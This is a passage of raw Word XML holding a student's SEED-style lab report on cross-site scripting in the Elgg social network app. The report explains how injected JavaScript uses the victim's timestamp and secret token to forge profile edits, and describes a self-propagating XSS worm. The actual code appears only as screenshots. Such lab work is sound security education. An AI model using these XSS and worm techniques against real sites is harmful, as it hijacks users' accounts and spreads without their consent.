          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006A6A26">
        <w:rPr>
          <w:rFonts w:ascii="Dingbats" w:hAnsi="Dingbats" w:cs="Dingbats"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, why are they are needed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20426CE2" w14:textId="501FF7B3" w:rsidR="000068A4" w:rsidRDefault="009772FC" w:rsidP="000F7270">
      <w:pPr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>Line 1 and 2</w:t>
      </w:r>
      <w:r w:rsidR="000464E6">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00073BFF">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">get the timestamp and secret token </w:t>
      </w:r>
      <w:r w:rsidR="000E5141">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">values from the corresponding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E5141">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E5141">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> variables.</w:t>
      </w:r>
      <w:r w:rsidR="00744281">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> They are needed </w:t>
      </w:r>
      <w:r w:rsidR="00361CAE">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">because </w:t>
      </w:r>
      <w:r w:rsidR="00BC62F1">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">in the server we always check </w:t>
      </w:r>
      <w:r w:rsidR="00F333BF">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>if a request has valid timestamp and secret token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756E5BCD" w14:textId="2C194316" w:rsidR="00F333BF" w:rsidRDefault="0078691F" w:rsidP="000F7270">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22658AB4" wp14:editId="2C86D8D5">
            <wp:extent cx="4308339" cy="17034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241" cy="171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7077" w14:textId="77C1F9E3" w:rsidR="000C43ED" w:rsidRDefault="000079C7" w:rsidP="000079C7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Medi" w:hAnsi="NimbusRomNo9L-Medi" w:cs="NimbusRomNo9L-Medi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Question 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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RomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application only provide the Editor mode for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusMonL-Regu" w:hAnsi="NimbusMonL-Regu" w:cs="NimbusMonL-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"About Me" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>field, i.e.,</w:t>
      </w:r>
      <w:r w:rsidR="0027260B">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>you cannot switch to the Text mode, can you still launch a successful attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D3C7B" w14:textId="24DFBB22" w:rsidR="0027260B" w:rsidRDefault="0027260B" w:rsidP="000079C7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>No</w:t>
      </w:r>
      <w:r w:rsidR="008C6583">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0048353B">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The editor mode will add extra codes to the message to </w:t>
      </w:r>
      <w:r w:rsidR="00052C7F">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">make </w:t>
      </w:r>
      <w:r w:rsidR="00BF59C5">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">my JS code </w:t>
      </w:r>
      <w:r w:rsidR="00AB05B1">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:r w:rsidR="00D9606E">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Only in the text mode can I </w:t>
      </w:r>
      <w:r w:rsidR="00E964B2">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">insert my JS code </w:t>
      </w:r>
      <w:r w:rsidR="00345798">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>just like editing the original HTML file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361ABC67" w14:textId="42CE43E3" w:rsidR="00F74EA4" w:rsidRDefault="00F74EA4" w:rsidP="00F74EA4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Task 5: Modifying the Victim’s Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6767D3" w14:textId="063BAE92" w:rsidR="00FC039D" w:rsidRDefault="00FC039D" w:rsidP="00FC039D">
      <w:r>
        <w:t>Firstly, modify the codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA4BBAE" w14:textId="13D7A961" w:rsidR="00FC039D" w:rsidRDefault="00FC039D" w:rsidP="00FC039D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637F9F9B" wp14:editId="717C95C9">
            <wp:extent cx="3343945" cy="2833054"/>
            <wp:effectExtent l="0" t="0" r="889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137" cy="2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9AD2" w14:textId="222E1E8E" w:rsidR="003E5773" w:rsidRPr="00FC039D" w:rsidRDefault="003E5773" w:rsidP="00FC039D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Then, fill the about me with the code above in the text mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0774EC" w14:textId="508627EB" w:rsidR="00F74EA4" w:rsidRDefault="00A8139E" w:rsidP="00F74EA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34F151CB" wp14:editId="2CC8C086">
            <wp:extent cx="3089832" cy="1749516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779" cy="17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325" w14:textId="61B95851" w:rsidR="00D42FCF" w:rsidRDefault="00D42FCF" w:rsidP="00F74EA4">
      <w:r>
        <w:t>Log in as Alice and find there are no messages in Alice’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DF75D" w14:textId="610AA056" w:rsidR="00D42FCF" w:rsidRDefault="00B35A02" w:rsidP="00F74EA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3777CE6F" wp14:editId="66763CE2">
            <wp:extent cx="2800825" cy="2225216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7494" cy="22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F535" w14:textId="2C4B1221" w:rsidR="00B35A02" w:rsidRDefault="00B35A02" w:rsidP="00F74EA4">
      <w:r>
        <w:t xml:space="preserve">View </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> profile in Alice’s account and back to Alice’s profile page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57034E09" w14:textId="21AC470E" w:rsidR="00B35A02" w:rsidRDefault="000554BD" w:rsidP="00F74EA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA1AE33" wp14:editId="09C0DB46">
            <wp:extent cx="2912331" cy="2130076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3104" cy="214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B083" w14:textId="672917EF" w:rsidR="00C52CBA" w:rsidRDefault="00EB3620" w:rsidP="00F74EA4">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00D759EC">
        <w:t xml:space="preserve">task succeeds. </w:t>
      </w:r>
      <w:r w:rsidR="0081729D">
        <w:t xml:space="preserve">As we know </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0081729D">
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0081729D">
        <w:t xml:space="preserve"> has a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0081729D">
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0081729D">
        <w:t xml:space="preserve"> of 47, and we added the if condition to avoid the </w:t>
      </w:r>
      <w:r w:rsidR="00904A42">
        <w:t xml:space="preserve">malicious code attacks </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00142DDC">
        <w:t>Samy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00142DDC">
        <w:t xml:space="preserve"> profile. </w:t>
      </w:r>
      <w:r w:rsidR="00904A42">
        <w:t xml:space="preserve">Once Alice logs in and views </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012073">
        <w:t>Samy’</w:t>
      </w:r>
      <w:r w:rsidR="005A6AE9">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A6AE9">
        <w:t xml:space="preserve"> profile, since Alice’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A6AE9">
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A6AE9">
        <w:t xml:space="preserve"> is 44 not 47, the </w:t>
      </w:r>
      <w:r w:rsidR="0065172B">
        <w:t xml:space="preserve">edit </w:t>
      </w:r>
      <w:r w:rsidR="00E55640">
        <w:t xml:space="preserve">request will be generated automatically. </w:t>
      </w:r>
      <w:r w:rsidR="00F23853">
        <w:t xml:space="preserve">So, after </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F23853">
        <w:t>come</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F23853">
        <w:t xml:space="preserve"> back to Alice’s profile, I find my message is in Alice’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F41AEB" w14:textId="3AA82BB5" w:rsidR="00482E35" w:rsidRDefault="005E7F08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Medi" w:hAnsi="NimbusRomNo9L-Medi" w:cs="NimbusRomNo9L-Medi"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Question 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why do we need Line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">? Remove this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>line, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> repeat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">your attack. Report and explain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>your observation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A18F13" w14:textId="2BF79370" w:rsidR="00F74A7C" w:rsidRDefault="00F75DDB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>Modify the program and make the if condition always true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E00AA6" w14:textId="64A17D40" w:rsidR="00F75DDB" w:rsidRDefault="00F75DDB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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61BC8F4C" wp14:editId="17BD420D">
            <wp:extent cx="2917083" cy="23309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8590" cy="23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DAC4" w14:textId="02AA8248" w:rsidR="00D11BEF" w:rsidRDefault="00D11BEF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>Redo the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254C3EB" w14:textId="31714B8A" w:rsidR="00D11BEF" w:rsidRDefault="00716AF7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845DE6A" wp14:editId="178A587C">
            <wp:extent cx="3223342" cy="2225216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4892" cy="22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357" w14:textId="127B7887" w:rsidR="00716AF7" w:rsidRDefault="00716AF7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 xml:space="preserve">I noticed that after refreshing </w:t>
      </w:r>
      <w:r w:rsidR="00166779">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">the page, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00166779">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00166779">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has updated his </w:t>
      </w:r>
      <w:r w:rsidR="00A20D23">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>profile by the information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB7F07" w14:textId="20EC0FA0" w:rsidR="00A20D23" w:rsidRDefault="00A20D23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 xml:space="preserve">Double-check </w:t>
      </w:r>
      <w:r w:rsidR="00AC2E2D">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AC2E2D">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>profile editor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B202C11" w14:textId="57EEFC32" w:rsidR="00AC2E2D" w:rsidRDefault="00D0790C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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C7370F1" wp14:editId="6EA430CF">
            <wp:extent cx="2836086" cy="1432384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0208" cy="14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74E" w14:textId="3438C185" w:rsidR="00D4331F" w:rsidRDefault="00D4331F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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4622B870" wp14:editId="0F2FB4D3">
            <wp:extent cx="2835252" cy="1342529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8375" cy="13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E02" w14:textId="5549FE8D" w:rsidR="00D4331F" w:rsidRDefault="00D4331F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 xml:space="preserve">Surprisingly, we found our JS program disappears and </w:t>
      </w:r>
      <w:r w:rsidR="00073485">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>there is only the message left. Which means, the attack to others will fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D0E64C" w14:textId="27DBBC5C" w:rsidR="001641AE" w:rsidRDefault="00073485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/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The main reason is that </w:t>
      </w:r>
      <w:r w:rsidR="00223CFD">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">after refreshing the page, the </w:t>
      </w:r>
      <w:r w:rsidR="001641AE">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">request was sent and changed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001641AE">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Samy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001641AE">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> own profile description to “Xiaohan is my Hero”. Of course, the program we wrote in this area is replaced by the new message. That is why the attack fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5D869" w14:textId="63C5B863" w:rsidR="006E2553" w:rsidRDefault="006E2553" w:rsidP="005E7F0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2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The line 1 prevents </w:t>
      </w:r>
      <w:r w:rsidR="001E3626">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="003C50B8">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>attacking the attacker himself</w:t>
      </w:r>
      <w:r w:rsidR="00E152A1">
        <w:rPr>
          <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:hAnsi="NimbusRomNo9L-Regu" w:cs="NimbusRomNo9L-Regu"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid overwriting the malicious JS code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333FA780" w14:textId="18681614" w:rsidR="00E152A1" w:rsidRDefault="005933E4" w:rsidP="005933E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 6: Writing a Self-Propagating XSS Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C23ADE4" w14:textId="4CFD8EAE" w:rsidR="005933E4" w:rsidRDefault="00F51626" w:rsidP="005933E4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0A95C9" wp14:editId="42AEF519">
            <wp:extent cx="2804150" cy="198208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635" cy="19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97CE" w14:textId="649873EE" w:rsidR="00F51626" w:rsidRDefault="00F51626" w:rsidP="005933E4">
      <w:r>
        <w:t xml:space="preserve">Before, Alice does not have any </w:t>
      </w:r>
      <w:r w:rsidR="006051D0">
        <w:t>friends and does not have any contains in her profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A456FD" w14:textId="5F29D0B8" w:rsidR="006051D0" w:rsidRDefault="006051D0" w:rsidP="005933E4">
      <w:r>
        <w:t xml:space="preserve">After visiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Samy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> profile page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238FE1B" w14:textId="759FA85A" w:rsidR="006051D0" w:rsidRDefault="009811D4" w:rsidP="005933E4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E83EC01" wp14:editId="092D8BB9">
            <wp:extent cx="2843625" cy="1864824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8183" cy="18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7B03" w14:textId="29D53D0B" w:rsidR="00616CDC" w:rsidRDefault="00616CDC" w:rsidP="005933E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We noticed that not only Xiaohan is my Hero message shows in Alice’s profile, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129877A1" w14:textId="134CC09A" w:rsidR="009811D4" w:rsidRDefault="004673FB" w:rsidP="005933E4">
      <w:r>
